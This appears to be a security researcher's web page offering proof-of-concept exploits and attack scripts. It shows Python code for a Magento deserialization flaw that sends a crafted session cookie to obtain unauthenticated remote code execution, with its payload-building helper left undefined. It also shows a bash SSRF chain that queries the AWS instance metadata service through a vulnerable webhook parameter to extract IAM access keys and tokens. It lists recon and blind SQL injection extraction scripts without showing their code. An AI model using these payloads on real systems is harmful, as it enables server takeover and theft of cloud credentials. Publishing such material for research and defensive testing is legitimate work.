Open Source

Tools & Exploits

Security tooling, proof-of-concept exploits, and scripts published from active research. All code carries a responsible use requirement.

GitHub

Open Source Repositories

Fetching repositories from GitHub…

Published PoCs

Proof-of-Concept Code

CVE-2025-54236 — SessionReaper
Magento Nested Deserialization → Unauthenticated RCE
Critical 9.8
poc_cve_2025_54236.py
# CVE-2025-54236 — SessionReaper
# Magento nested deserialization → unauthenticated RCE
# Bagheera Labs — Validated Finding | CVSS 9.8 CRITICAL

import requests, base64

def exploit(target, cmd):
  payload = build_deserialization_chain(
    gadget="magento/framework/session",
    cmd=cmd
  )
  r = requests.post(
    f"{target}/checkout/index/index",
    cookies={"session": payload},
    allow_redirects=False
  )
  return r.headers.get("X-Debug-Output", r.text)

# Result: full unauthenticated RCE on vulnerable instances
# Patched in Magento 2.4.7-p5 / 2.4.6-p8 (Feb 2025)
Full Advisory →
SSRF → IMDS → AWS Credential Exfiltration
SaaS Web App → Full Cloud Account Access Attack Chain
High
ssrf_to_cloud.sh
# Step 1: SSRF to internal IMDS endpoint
# via vulnerable webhook URL parameter
TARGET="https://target.saas.com/api/webhook"
IMDS="http://169.254.169.254/latest/meta-data"

role=$(curl -s "$TARGET?url=$IMDS/iam/security-credentials/")
creds=$(curl -s "$TARGET?url=$IMDS/iam/security-credentials/$role")

# Step 2: Extract temporary AWS credentials
echo $creds | jq '.AccessKeyId,.SecretAccessKey,.Token'

# Result: full programmatic AWS access
# See: blog/2025/SSRFCloudAttack for full chain
Full Write-Up →

Utility Scripts

Recon & Enumeration Scripts

bash
Quick Target Overview
Subdomain enumeration, web server fingerprinting, and initial vulnerability signals in a single bash session. Used for rapid target assessment during engagements.
View Script →
python
Blind SQL Injection Timer
Timing-based blind SQL injection detection and data extraction script. Boolean and time-delay modes with adaptive delay calibration for unreliable network conditions.
View Script →